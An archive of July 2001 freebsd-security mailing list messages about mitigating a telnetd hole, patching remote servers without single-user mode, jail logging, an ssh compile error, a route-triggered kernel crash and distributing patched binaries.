--bob To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Jul 25 14:42:43 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep04-svc.swip.net (fep04.swip.net [130.244.199.132]) by hub.freebsd.org (Postfix) with ESMTP id 7BD8C37B401 for ; Wed, 25 Jul 2001 14:42:39 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep04-svc.swip.net with ESMTP id <20010725214237.KBCH5761.fep04-svc.swip.net@tubbs.home.se>; Wed, 25 Jul 2001 23:42:37 +0200 Message-Id: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Wed, 25 Jul 2001 23:47:52 -0700 To: bob , FreeBSD Security From: Markus =?iso-8859-1?Q?Hallstr=F6m?= Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 14:23 2001-07-25 -0700, bob wrote: >What is the best way for me to secure my 3.4-Release machine from the >recent telnetd exploit? > >I don't have physical acces to the machine (its on the other coast) and I >don't have any of the cvsup packages installed. The packages and ports >seem to be unavailable for this release. I'd like to just upgrade through >source, but i'm not sure how to get the necessary packages. 
> --bob

Disable telnet in inetd and start using ssh would be a good workaround.

/TUBBS

From owner-freebsd-security Wed Jul 25 15:10: 0 2001 Delivered-To: freebsd-security@freebsd.org Received: from wasabi.sushigoth.com (dsl081-059-169.sfo1.dsl.speakeasy.net [64.81.59.169]) by hub.freebsd.org (Postfix) with ESMTP id 7DA0C37B403 for ; Wed, 25 Jul 2001 15:09:58 -0700 (PDT) (envelope-from bob@antepenultimate.org) Received: from localhost (robert@localhost) by wasabi.sushigoth.com (8.11.1/8.11.1) with ESMTP id f6PM3bJ05306; Wed, 25 Jul 2001 15:03:37 -0700 (PDT) Date: Wed, 25 Jul 2001 15:03:37 -0700 (PDT) From: bob X-X-Sender: To: Markus Hallström Cc: bob , FreeBSD Security Subject: Re: Telnet exploit & 3.4-RELEASE In-Reply-To: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=X-UNKNOWN Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Sorry, I should have mentioned that about a dozen of my friends use this machine for mail and such, so I need to provide telnet access for them. Many connect from machines where installing an ssh client isn't possible.

--bob

On Wed, 25 Jul 2001, Markus Hallström wrote:
> At 14:23 2001-07-25 -0700, bob wrote:
> > What is the best way for me to secure my 3.4-RELEASE machine from the
> > recent telnetd exploit?
...
> > Disable telnet in inetd and start using ssh would be a good workaround
> >
> > /TUBBS

From owner-freebsd-security Wed Jul 25 15:53:46 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep02-svc.swip.net (fep02.swip.net [130.244.199.130]) by hub.freebsd.org (Postfix) with ESMTP id 48E3037B407 for ; Wed, 25 Jul 2001 15:53:40 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep02-svc.swip.net with ESMTP id <20010725225338.KLZQ9787.fep02-svc.swip.net@tubbs.home.se>; Thu, 26 Jul 2001 00:53:38 +0200 Message-Id: <5.0.2.1.2.20010726002921.04d8cec0@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Thu, 26 Jul 2001 00:58:53 -0700 To: bob From: Markus Hallström Subject: Re: Telnet exploit & 3.4-RELEASE Cc: FreeBSD Security In-Reply-To: References: <5.0.2.1.2.20010725234729.04b4b160@students.su.se> Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1"; format=flowed Content-Transfer-Encoding: quoted-printable Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 15:03 2001-07-25 -0700, bob wrote:
> Sorry, I should have mentioned that about a dozen of my friends use this
> machine for mail and such, so I need to provide telnet access for them.
> Many connect from machines where installing an ssh client isn't possible.
>
> --bob
>
> On Wed, 25 Jul 2001, Markus Hallström wrote:
>
> > At 14:23 2001-07-25 -0700, bob wrote:
> > > What is the best way for me to secure my 3.4-RELEASE machine from the
> > > recent telnetd exploit?
> ...
> > > Disable telnet in inetd and start using ssh would be a good workaround
> > >
> > > /TUBBS

Get new friends! If that isn't an option I would check out some of the ssh clients you can run from a website. You could check http://www.appgate.org/products/mindterm/ and http://www.employees.org/~satch/ssh/faq/ssh-faq-2.html#ss2.2.2

I have no idea if any of these are any good. You really shouldn't run telnet anyhow.

/TUBBS

From owner-freebsd-security Wed Jul 25 17:56:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 7A42C37B407 for ; Wed, 25 Jul 2001 17:56:07 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200HM52LGD3@smtp2.netc.pt>; Thu, 26 Jul 2001 01:56:06 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 6EEB27C80; Thu, 26 Jul 2001 01:57:30 +0100 (WEST) Date: Thu, 26 Jul 2001 01:57:30 +0100 From: Nuno Teixeira Subject: Updating security fixes without single user mode? To: freebsd-security@freebsd.org Message-id: <20010726015730.F5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello to all,

At my workstation I'm tracking STABLE with no problems.

At my server I just want to update the system with security fixes, etc.
My question is:

Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but after makeworld and makekernel, I need to go into single user mode and make installworld and mergemaster.

The problem is that my server is at US and I live in Portugal! So, it's impossible to run the system in single user mode.

What is the best way of maintaining the system updated without single user mode?

Patches? Packages?

Thanks in advance,

--
Nuno Teixeira
Dir. Técnico pt-quorum.com
--
PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc
Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7
--

From owner-freebsd-security Wed Jul 25 18: 4:16 2001 Delivered-To: freebsd-security@freebsd.org Received: from fep01-svc.swip.net (fep01.swip.net [130.244.199.129]) by hub.freebsd.org (Postfix) with ESMTP id 18EA337B406 for ; Wed, 25 Jul 2001 18:04:11 -0700 (PDT) (envelope-from tubbs@home.se) Received: from tubbs.home.se ([213.100.32.142]) by fep01-svc.swip.net with ESMTP id <20010726010409.MLEL20404.fep01-svc.swip.net@tubbs.home.se>; Thu, 26 Jul 2001 03:04:09 +0200 Message-Id: <5.0.2.1.2.20010726030631.04de4ec0@students.su.se> X-Sender: m74mh81f@students.su.se X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Date: Thu, 26 Jul 2001 03:09:25 -0700 To: Nuno Teixeira , freebsd-security@FreeBSD.ORG From: Markus Hallström Subject: Re: Updating security fixes without single user mode? In-Reply-To: <20010726015730.F5227@gateway.bogus> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

At 01:57 2001-07-26 +0100, Nuno Teixeira wrote:
> Hello to all,
>
> At my workstation I'm tracking STABLE with no problems.
> At my server I just want to update the system with security fixes, etc.
>
> My question is:
>
> Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but
> after makeworld and makekernel, I need to
> go into single user mode and make installworld and mergemaster.
>
> The problem is that my server is at US and I live in Portugal! So, it's
> impossible to run
> the system in single user mode.
>
> What is the best way of maintaining the system updated without single user mode?
>
> Patches? Packages?
>
> Thanks in advance,

You can always be a daredevil and make installworld and run mergemaster in multiuser mode. It usually works for me ;-)

/TUBBS

From owner-freebsd-security Wed Jul 25 18: 4:30 2001 Delivered-To: freebsd-security@freebsd.org Received: from axl.seasidesoftware.co.za (axl.seasidesoftware.co.za [196.31.7.201]) by hub.freebsd.org (Postfix) with ESMTP id AE76137B403 for ; Wed, 25 Jul 2001 18:04:25 -0700 (PDT) (envelope-from sheldonh@starjuice.net) Received: from sheldonh (helo=axl.seasidesoftware.co.za) by axl.seasidesoftware.co.za with local-esmtp (Exim 3.31 #1) id 15PZaR-0006HG-00; Thu, 26 Jul 2001 03:05:11 +0200 From: Sheldon Hearn To: Nuno Teixeira Cc: freebsd-security@freebsd.org Subject: Re: Updating security fixes without single user mode? In-reply-to: Your message of "Thu, 26 Jul 2001 01:57:30 +0100." <20010726015730.F5227@gateway.bogus> Date: Thu, 26 Jul 2001 03:05:11 +0200 Message-ID: <24133.996109511@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote:

> What is the best way of maintaining the system updated without single user mode?
>
> Patches? Packages?
Intelligent application of patches and careful rebuilding of affected binaries. This requires quite a good understanding of how the FreeBSD build fits together. You can get away with reading the advisories carefully.

Should you ever need a patch that involves a change to the kernel, you're SOL. You can do the installkernel, installworld and mergemaster in multiuser mode and hope for the best (as many people do) when you reboot.

However, kernel changes on a release security branch are expected to be infrequent.

Ciao,
Sheldon.

From owner-freebsd-security Wed Jul 25 18:17:10 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 1196137B401 for ; Wed, 25 Jul 2001 18:17:05 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200I8L3KDSE@smtp2.netc.pt>; Thu, 26 Jul 2001 02:17:03 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 015B87C80; Thu, 26 Jul 2001 02:18:26 +0100 (WEST) Date: Thu, 26 Jul 2001 02:18:26 +0100 From: Nuno Teixeira Subject: Re: Updating security fixes without single user mode?
In-reply-to: <24133.996109511@axl.seasidesoftware.co.za>; from sheldonh@starjuice.net on Thu, Jul 26, 2001 at 03:05:11AM +0200 To: Sheldon Hearn Cc: freebsd-security@freebsd.org Message-id: <20010726021826.I5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Thu, Jul 26, 2001 at 03:05:11AM +0200, Sheldon Hearn wrote:
> On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote:
>
> > What is the best way of maintaining the system updated without single user mode?
> >
> > Patches? Packages?
>
> Intelligent application of patches and careful rebuilding of affected
> binaries. This requires quite a good understanding of how the FreeBSD
> build fits together. You can get away with reading the advisories
> carefully.
>
> Should you ever need a patch that involves a change to the kernel, you're
> SOL. You can do the installkernel, installworld and mergemaster in
> multiuser mode and hope for the best (as many people do) when you
> reboot.
>
> However, kernel changes on a release security branch are expected to be
> infrequent.
>
> Ciao,
> Sheldon.

Hi,

Just one more question:

Does tracking RELEASE_4_3 include fixes for all problems listed in http://www.freebsd.org/security/index.html#adv ?

Thanks,

--
Nuno Teixeira
Dir.
Técnico pt-quorum.com
--
PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc
Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7
--

From owner-freebsd-security Wed Jul 25 18:23:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp2.netc.pt (smtp2.netc.pt [212.18.160.142]) by hub.freebsd.org (Postfix) with ESMTP id 4D3EA37B401 for ; Wed, 25 Jul 2001 18:23:33 -0700 (PDT) (envelope-from admin@pt-quorum.com) Received: from gateway.bogus (p082-237.netc.pt) by smtp2.netc.pt (Sun Internet Mail Server sims.3.5.1999.05.24.18.28.p7) with ESMTP id <0GH200IEM3V6SE@smtp2.netc.pt>; Thu, 26 Jul 2001 02:23:32 +0100 (WET DST) Received: by gateway.bogus (Postfix, from userid 1001) id 394297C80; Thu, 26 Jul 2001 02:24:56 +0100 (WEST) Date: Thu, 26 Jul 2001 02:24:56 +0100 From: Nuno Teixeira Subject: Re: Updating security fixes without single user mode? In-reply-to: <20010726021826.I5227@gateway.bogus>; from nuno.teixeira@pt-quorum.com on Thu, Jul 26, 2001 at 02:18:26AM +0100 To: freebsd-security@freebsd.org Message-id: <20010726022455.J5227@gateway.bogus> MIME-version: 1.0 Content-type: text/plain; charset=iso-8859-1 Content-disposition: inline Content-transfer-encoding: 8BIT User-Agent: Mutt/1.2.5i X-Operating-System: FreeBSD 4.3-STABLE References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> <20010726021826.I5227@gateway.bogus> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

On Thu, Jul 26, 2001 at 02:18:26AM +0100, Nuno Teixeira wrote:
> On Thu, Jul 26, 2001 at 03:05:11AM +0200, Sheldon Hearn wrote:
> > On Thu, 26 Jul 2001 01:57:30 +0100, Nuno Teixeira wrote:
> >
> > > What is the best way of maintaining the system updated without single user mode?
> > >
> > > Patches? Packages?
> >
> > Intelligent application of patches and careful rebuilding of affected
> > binaries. This requires quite a good understanding of how the FreeBSD
> > build fits together. You can get away with reading the advisories
> > carefully.
> >
> > Should you ever need a patch that involves a change to the kernel, you're
> > SOL. You can do the installkernel, installworld and mergemaster in
> > multiuser mode and hope for the best (as many people do) when you
> > reboot.
> >
> > However, kernel changes on a release security branch are expected to be
> > infrequent.
> >
> > Ciao,
> > Sheldon.
>
> Hi,
>
> Just one more question:
>
> Does tracking RELEASE_4_3 include fixes for all problems listed in http://www.freebsd.org/security/index.html#adv ?
>
> Thanks,
>
> --

Hi,

Just one more question:

Does tracking RELEASE_4_3 include fixes for all problems listed in http://www.freebsd.org/security/index.html#adv ?

Thanks,

--
Nuno Teixeira
Dir. Técnico pt-quorum.com
--
PGP Public Key: http://www.pt-quorum.com/pgp/nunoteixeira.asc
Key fingerprint: 8C2C B364 D4DC 0C92 56F5 CE6F 8F07 720A 63A0 4FC7
--

From owner-freebsd-security Wed Jul 25 19:15:51 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id E484437B401 for ; Wed, 25 Jul 2001 19:15:46 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id 0944066E04; Wed, 25 Jul 2001 19:15:45 -0700 (PDT) Date: Wed, 25 Jul 2001 19:15:45 -0700 From: Kris Kennaway To: Nuno Teixeira Cc: Sheldon Hearn , freebsd-security@FreeBSD.ORG Subject: Re: Updating security fixes without single user mode?
Message-ID: <20010725191545.B3833@xor.obsecurity.org> References: <20010726015730.F5227@gateway.bogus> <24133.996109511@axl.seasidesoftware.co.za> <20010726021826.I5227@gateway.bogus> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="uZ3hkaAS1mZxFaxD" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <20010726021826.I5227@gateway.bogus>; from nuno.teixeira@pt-quorum.com on Thu, Jul 26, 2001 at 02:18:26AM +0100 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

--uZ3hkaAS1mZxFaxD
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline

On Thu, Jul 26, 2001 at 02:18:26AM +0100, Nuno Teixeira wrote:
> Does tracking RELEASE_4_3 include fixes for all problems listed in http://www.freebsd.org/security/index.html#adv ?

s/RELEASE_4_3/RELENG_4_3/

Yes.

Kris

--uZ3hkaAS1mZxFaxD
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7X31RWry0BWjoQKURAlQ5AJ0Xe3FYzMwmUbAGqHYqSM/GcIUcHACgytnq
kfXPqA9mGeQoEPwcBB4WaMY=
=5RuA
-----END PGP SIGNATURE-----

--uZ3hkaAS1mZxFaxD--

From owner-freebsd-security Wed Jul 25 20:51: 1 2001 Delivered-To: freebsd-security@freebsd.org Received: from iguana.hypnoticlizard.com (calnet23-208.gtecablemodem.com [207.175.246.208]) by hub.freebsd.org (Postfix) with ESMTP id 4406E37B401 for ; Wed, 25 Jul 2001 20:50:58 -0700 (PDT) (envelope-from charlie@iguana.hypnoticlizard.com) Received: (from charlie@localhost) by iguana.hypnoticlizard.com (8.11.4/8.11.2) id f6Q3qIY00447 for freebsd-security@freebsd.org; Wed, 25 Jul 2001 20:52:18 -0700 (PDT) (envelope-from charlie) Content-Type: text/plain;
charset="iso-8859-1" From: Charlie Baysinger To: freebsd-security@freebsd.org Subject: syslogd with the -l option Date: Wed, 25 Jul 2001 20:52:18 -0700 X-Mailer: KMail [version 1.2] MIME-Version: 1.0 Message-Id: <01072520521800.00375@iguana.hypnoticlizard.com> Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello,

How (in)secure is using the syslogd "-l" option to open an additional log socket inside a FreeBSD jail from the host system? What is recommended for consolidating jail logs?

Thank you for any suggestions.

--
Charlie

From owner-freebsd-security Thu Jul 26 0:32:21 2001 Delivered-To: freebsd-security@freebsd.org Received: from star.rila.bg (star.rila.bg [212.39.75.32]) by hub.freebsd.org (Postfix) with ESMTP id A93A537B407 for ; Thu, 26 Jul 2001 00:32:17 -0700 (PDT) (envelope-from vlady@star.rila.bg) Received: from star.rila.bg (vlady@localhost [127.0.0.1]) by star.rila.bg (8.11.4/8.11.4) with ESMTP id f6Q7Wrc36388 for ; Thu, 26 Jul 2001 10:32:53 +0300 (EEST) (envelope-from vlady@star.rila.bg) Message-Id: <200107260732.f6Q7Wrc36388@star.rila.bg> X-Mailer: exmh version 2.4 05/15/2001 with nmh-1.0.3 To: freebsd-security@freebsd.org From: "Vladimir Terziev" Subject: Compilation problem with ssh-3.0.1 on FreeBSD 4.3-STABLE box Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Thu, 26 Jul 2001 10:32:53 +0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi all,

I've downloaded a copy of ssh-3.0.1 from ftp.ssh.com. I've tried to compile it but I've got an error. Has anybody succeeded in compiling ssh-3.0.1 (ssh from ssh.com)?
regards,
Vladimir

From owner-freebsd-security Thu Jul 26 1:32: 5 2001 Delivered-To: freebsd-security@freebsd.org Received: from xs4nobody.nl (xs4nobody.nl [62.58.36.22]) by hub.freebsd.org (Postfix) with SMTP id EE6CC37B401 for ; Thu, 26 Jul 2001 01:32:01 -0700 (PDT) (envelope-from bart@xs4nobody.nl) Received: (qmail 24073 invoked by uid 1000); 26 Jul 2001 08:31:54 -0000 Date: Thu, 26 Jul 2001 10:31:54 +0200 From: Bart Matthaei To: freebsd-security@freebsd.org Subject: Route makes my machine crash.. (weird bug) Message-ID: <20010726103154.A24057@heresy.xs4nobody.nl> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hi,

I discovered something really odd last night. It happened twice; I checked that it wasn't a one-timer.

This is the deal:

62.58.36.22 - xs4nobody.nl -> 10.0.0.1 - tunnel-remote
  | -> 10.0.0.2 - tunnel-home ( real ip = 212.58.188.107 )
62.58.36.169 - lust.xs4nobody.nl (ip of my gateway at home. the ip is routed via the 10.0.0 gif tunnel)

OK. I use ipfw to forward all the packets coming from my /30 into the tunnel. So on my gateway, I use:

ipfw add $some security stuff for my indy ( with 62.58.36 ip ) and lust.
ipfw add fwd 10.0.0.1 all from 62.58.36.168/30 to any

Now, I use ipfw so I don't have to set a default route on my gateway via the tunnel (every leech or download would go over the tunnel, and I'd rather have that kind of stuff over my normal quicknet ip (less latency)); only my indy uses the tunnel by default.

OK, last night I wanted to add a route so that all the traffic to 62.58.63.29 (alias on xs4nobody.nl box) goes via the tunnel.
So (I tried to route it directly to 10.0.0.1) I used "route add 62.58.36.29 10.0.0.1". I did it remotely; my connection promptly died. When I got home, I saw that my screensaver on my FreeBSD box was frozen. I tried to reach the machine via my internal network, but it was totally crashed.

So, I rebooted and tried again to test if it was a bug. This time, I routed it to the tunneled ip of my gateway, with the hope that my firewall would understand it and route it to 10.0.0.1 via ipfw: "route add 62.58.36.29 62.58.36.169". *POOF* The box crashed again.

So I started thinking. The problem is, I guess, that I'm routing the stuff to my own IP (which shouldn't really be a problem, but could cause the error because I use ipfw instead of a static route). So the routing table screws up. _BUT_ it shouldn't cause my machine to crash.

Can anybody test this on other FreeBSD releases? I use FreeBSD 4.3-STABLE. 4.3-RELEASE (one of a week ago) does the same thing.

With regards,

Bart Matthaei

--
Bart Matthaei | bart@xs4nobody.nl | +31 6 24907042
Cysonet Managed Hosting | bart@cysonet.com
-------------------------------------------------
/* It's always funny until someone gets hurt..
 * (and then it's just hilarious) */

From owner-freebsd-security Thu Jul 26 4:20:31 2001 Delivered-To: freebsd-security@freebsd.org Received: from internethelp.ru (wh.internethelp.ru [212.113.112.145]) by hub.freebsd.org (Postfix) with ESMTP id 252FE37B405 for ; Thu, 26 Jul 2001 04:20:19 -0700 (PDT) (envelope-from nkritsky@internethelp.ru) Received: from IBMKA (ibmka.internethelp.ru. [192.168.0.6]) by internethelp.ru (8.9.3/8.9.3) with ESMTP id PAA11769; Thu, 26 Jul 2001 15:19:42 +0400 (MSD) Date: Thu, 26 Jul 2001 15:19:44 +0400 From: "Nickolay A.Kritsky" X-Mailer: The Bat!
(v1.49) Personal Reply-To: "Nickolay A.Kritsky" Organization: IHelp X-Priority: 3 (Normal) Message-ID: <19360186994.20010726151944@internethelp.ru> To: Nuno Teixeira Cc: freebsd-security@FreeBSD.ORG Subject: Re: Updating security fixes without single user mode? In-reply-To: <20010726015730.F5227@gateway.bogus> References: <20010726015730.F5227@gateway.bogus> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello Nuno,

Thursday, July 26, 2001, 4:57:30 AM, you wrote:

NT> Hello to all,
NT> At my workstation I'm tracking STABLE with no problems.
NT> At my server I just want to update the system with security fixes, etc.
NT> My question is:
NT> Tracking RELEASE_4_3 (for a RELEASE 4.3 system) is a good option, but after makeworld and makekernel, I need to
NT> go into single user mode and make installworld and mergemaster.
NT> The problem is that my server is at US and I live in Portugal! So, it's impossible to run
NT> the system in single user mode.
NT> What is the best way of maintaining the system updated without single user mode?
NT> Patches? Packages?
NT> Thanks in advance,

Correct me if I am wrong, but AFAIK the only reason to run installkernel in single-user mode is that some permissions cannot be overridden by root in securelevel >1. So the first way is obvious: run with securelevel 0.
If you don't like it you can do something like this: add the following lines to your /etc/rc

	# run a one-shot script on the next boot, then remove it and reboot
	if [ -f /etc/rc.singleuser ]
	then
		/etc/rc.singleuser
		rm /etc/rc.singleuser
		reboot
	fi

;-------------------------------------------
; NKritsky
; SysAdmin InternetHelp.Ru
; http://www.internethelp.ru
; mailto:nkritsky@internethelp.ru

From owner-freebsd-security Thu Jul 26 4:26:49 2001 Delivered-To: freebsd-security@freebsd.org Received: from vindaloo.allsolutions.com.au (vindaloo.allsolutions.com.au [203.111.24.54]) by hub.freebsd.org (Postfix) with ESMTP id 4A2C137B403 for ; Thu, 26 Jul 2001 04:26:46 -0700 (PDT) (envelope-from David_May@allsolutions.com.au) Received: from roganjosh.allsolutions.com.au (roganjosh.allsolutions.com.au [192.9.200.253]) by vindaloo.allsolutions.com.au (8.9.3/8.9.3) with ESMTP id TAA02121 for ; Thu, 26 Jul 2001 19:26:38 +0800 (WST) (envelope-from David_May@allsolutions.com.au) From: David_May@allsolutions.com.au Subject: [Q] distribution of patched binaries for security fixes. To: Date: Thu, 26 Jul 2001 18:47:21 +0800 Message-ID: X-MIMETrack: Serialize by Router on Perth/All Solutions(Release 5.0.7 |March 21, 2001) at 07/26/2001 07:26:39 PM MIME-Version: 1.0 Content-type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Hello, I am setting up a FreeBSD machine to track the STABLE branch and to rebuild the system from time to time. The main reason being to keep track of security related fixes and enhancements. The documentation covers that quite well.

But I was wondering what is a good procedure to distribute updated binaries to other machines. I have several production machines that I would like to keep up-to-date but do not want to compile source on every machine.
Being able to create something like a Windows NT service pack would be nice :)

From owner-freebsd-security Thu Jul 26 4:37: 2 2001 Delivered-To: freebsd-security@freebsd.org Received: from obsecurity.dyndns.org (adsl-64-169-104-149.dsl.lsan03.pacbell.net [64.169.104.149]) by hub.freebsd.org (Postfix) with ESMTP id 3418637B407 for ; Thu, 26 Jul 2001 04:36:59 -0700 (PDT) (envelope-from kris@obsecurity.org) Received: by obsecurity.dyndns.org (Postfix, from userid 1000) id C62DA67226; Thu, 26 Jul 2001 04:36:57 -0700 (PDT) Date: Thu, 26 Jul 2001 04:36:57 -0700 From: Kris Kennaway To: David_May@allsolutions.com.au Cc: freebsd-security@FreeBSD.ORG Subject: Re: [Q] distribution of patched binaries for security fixes. Message-ID: <20010726043657.B42611@xor.obsecurity.org> References: Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-md5; protocol="application/pgp-signature"; boundary="DKU6Jbt7q3WqK7+M" Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from David_May@allsolutions.com.au on Thu, Jul 26, 2001 at 06:47:21PM +0800 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

--DKU6Jbt7q3WqK7+M
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

On Thu, Jul 26, 2001 at 06:47:21PM +0800, David_May@allsolutions.com.au wrote:
> Hello, I am setting up a FreeBSD machine to track the STABLE branch
> and to rebuild the system from time-to-time. The main reason being to
> keep track of security related fixes and enhancements. The documentation
> covers that quite well.
>
> But I was wondering what is a good procedure to distribute updated
> binaries to other machines.
> I have several production machines that I
> would like to keep up-to-date but do not want to compile source on
> every machine.
>
> Being able to create something like a Windows NT service pack
> would be nice :)

There are any number of tools you can use to distribute files: tar + scp, rsync, cvsup, 'make release' to make a full installation mirror, etc. If you want to automate the installation further you could create your own packages using pkg_create: this is very easy to do if you use the ports framework.

Kris

--DKU6Jbt7q3WqK7+M
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (FreeBSD)
Comment: For info see http://www.gnupg.org

iD8DBQE7YADYWry0BWjoQKURAvMYAKDG4Nc2806LifWrrezb0w1frRynKACg1s55
yg4P/w6eckDppNTbORkS7gc=
=fytW
-----END PGP SIGNATURE-----

--DKU6Jbt7q3WqK7+M--

